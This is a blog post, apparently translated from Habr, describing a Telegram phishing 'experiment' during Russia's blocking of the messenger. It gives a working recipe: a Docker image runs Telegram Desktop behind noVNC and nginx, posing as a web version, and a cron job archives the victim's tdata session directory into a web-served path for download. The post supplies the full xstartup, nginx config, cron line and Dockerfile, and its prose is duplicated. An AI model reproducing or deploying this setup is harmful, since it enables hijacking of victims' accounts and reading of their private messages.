Hijacking Telegram on Panic Waves
Today, the situation around the joint decision of the Federal Security Service of the Russian Federation and Roskomnadzor about blocking the Telegram messenger is very ambiguous. This decision is reckless for a variety of reasons, and it carries more problems than it does in combating the threat of terrorism.
For a mature business that took into account the risks associated with government decisions, this created some inconvenience because it had to use workaround solutions using a VPN. But for ordinary users who were not ready for this turn of events, this brought new threats. In a panic, users began to search and use the first available free VPNs, absolutely without thinking that this could turn into a trap for them in the form of DNS push-ups, and other MITM attacks.
Telegram has the largest audience, and this fact could not be ignored by the IT business. Companies, in turn, have invested huge capital in developing business tools using the API of this messenger. Even a number of government projects invested money in the development of technical support bots, a vivid example of which is the state services portal (EPGU).
')
The HYIP wave provoked a dispute with colleagues about the vulnerability of panicked users, and we decided to conduct an experiment on phishing Telegram.
Many users are faced with problems of access to the Web version of this messenger and we decided to play it. Our goal was to get the tdata profile, which stores those same notorious encryption keys and session data.
The composition of our recipe includes the following main components:
According to the plan, you need to assemble an image of Docker in which X and Telegrams will start, and noVNC will transmit us the launched Telegrams via nginx to the client’s web browser.
Step 1: We restrict the execution of the desktop environment, the execution of Telegrams only and its transmission through the VNC server.
To do this, create a .vnc / xstartup file with the following contents:
Step 2: We forward broadcast noVNC to port 80 using nginx.
Create a default configuration file to put it into the image later.
Step 3: Since we built an experimental model, and not a full Telegram phishing service, to extract the data we decided to copy the archive of the tdata directory using cron into one of the directories available to the web server.
Create a cron file with the following contents
Step 4: VNC:
This step requires noVNC customization, we cut out toolbars from it and registered an automatic connection to the VNC server, specifying the password that corresponds to the password .vnc / passwd. This password can be generated by the vncpasswd utility.
Step 5: Build the Docker image:
All that we prepared in advance, including the Telegram binary, we put in one directory, we create a Dockerfile and proceed to the assembly.
Step 6: After assembling and launching the image, using all the knowledge and skills in social engineering, we invite the victim of the experiment to tasting an alternative to the web version of Telegram.
One minute after authorization, download the profile / tests/data.tar.gz
Findings:
As you understand, I won the argument with my colleagues, but this win did not bring any joy. The state of affairs in the field of information security has negative trends related to the conditions of abrupt changes in Internet use policies in Russia. This research hastily shown that people even savvy in information technology can step on the rakes that are set by intruders.
PS: Do not forget to check open sessions of your messengers, maybe now someone is reading
For a mature business that took into account the risks associated with government decisions, this created some inconvenience because it had to use workaround solutions using a VPN. But for ordinary users who were not ready for this turn of events, this brought new threats. In a panic, users began to search and use the first available free VPNs, absolutely without thinking that this could turn into a trap for them in the form of DNS push-ups, and other MITM attacks.
Telegram has the largest audience, and this fact could not be ignored by the IT business. Companies, in turn, have invested huge capital in developing business tools using the API of this messenger. Even a number of government projects invested money in the development of technical support bots, a vivid example of which is the state services portal (EPGU).
')
The HYIP wave provoked a dispute with colleagues about the vulnerability of panicked users, and we decided to conduct an experiment on phishing Telegram.
Many users are faced with problems of access to the Web version of this messenger and we decided to play it. Our goal was to get the tdata profile, which stores those same notorious encryption keys and session data.
The composition of our recipe includes the following main components:
- Telegram Desktop 1.2.17 (linux)
- Docker version 17.05.0-ce
- noVNC
According to the plan, you need to assemble an image of Docker in which X and Telegrams will start, and noVNC will transmit us the launched Telegrams via nginx to the client’s web browser.
Step 1: We restrict the execution of the desktop environment, the execution of Telegrams only and its transmission through the VNC server.
To do this, create a .vnc / xstartup file with the following contents:
#!/bin/sh if [ -z "$VNCAPP" ] then # Uncomment the following two lines for normal desktop: unset SESSION_MANAGER exec /etc/X11/xinit/xinitrc [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" & x-window-manager & else xsetroot -solid black vncconfig -iconic & x-window-manager & $VNCAPP sleep 10 vncserver -kill $DISPLAY fi Step 2: We forward broadcast noVNC to port 80 using nginx.
Create a default configuration file to put it into the image later.
upstream vnc_proxy { server 127.0.0.1:6080; } server { listen 80 default_server; listen [::]:80 default_server; location / { add_header Access-Control-Allow-Origin *; proxy_pass http://127.0.0.1:6080; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_redirect default; client_max_body_size 10m; client_body_buffer_size 128k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; } location /websockify { proxy_http_version 1.1; proxy_pass http://vnc_proxy/; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; # VNC connection timeout proxy_read_timeout 61s; # Disable cache proxy_buffering off; } } Step 3: Since we built an experimental model, and not a full Telegram phishing service, to extract the data we decided to copy the archive of the tdata directory using cron into one of the directories available to the web server.
Create a cron file with the following contents
* * * * * root tar -czf /root/tests/data.tar.gz /root/.local/share/TelegramDesktop Step 4: VNC:
This step requires noVNC customization, we cut out toolbars from it and registered an automatic connection to the VNC server, specifying the password that corresponds to the password .vnc / passwd. This password can be generated by the vncpasswd utility.
Step 5: Build the Docker image:
All that we prepared in advance, including the Telegram binary, we put in one directory, we create a Dockerfile and proceed to the assembly.
# Version: 0.0.1 FROM vcatechnology/linux-mint MAINTAINER Poul Lysunenko <mpoul@hungosh.net> RUN apt update RUN apt install -y net-tools language-pack-ru cinnamon nginx chromium-browser vnc4server xvnc4viewer xfonts-base RUN locale-gen ru_RU.UTF-8 && dpkg-reconfigure locales COPY noVNC/ /root/ COPY .vnc/ /root/.vnc COPY default /etc/nginx/sites-available/ COPY Telegram /root/ COPY cron /etc/cron.d/sample RUN apt install -y cron EXPOSE 6080 ENTRYPOINT /usr/sbin/service nginx start && /usr/sbin/service cron start && VNCAPP=/root/Telegram vnc4server -depth 24 -geometry 800x600 && /root/utils/launch.sh --vnc localhost:5901 Step 6: After assembling and launching the image, using all the knowledge and skills in social engineering, we invite the victim of the experiment to tasting an alternative to the web version of Telegram.
One minute after authorization, download the profile / tests/data.tar.gz
Findings:
As you understand, I won the argument with my colleagues, but this win did not bring any joy. The state of affairs in the field of information security has negative trends related to the conditions of abrupt changes in Internet use policies in Russia. This research hastily shown that people even savvy in information technology can step on the rakes that are set by intruders.
PS: Do not forget to check open sessions of your messengers, maybe now someone is reading
Source: https://habr.com/ru/post/353948/
All Articles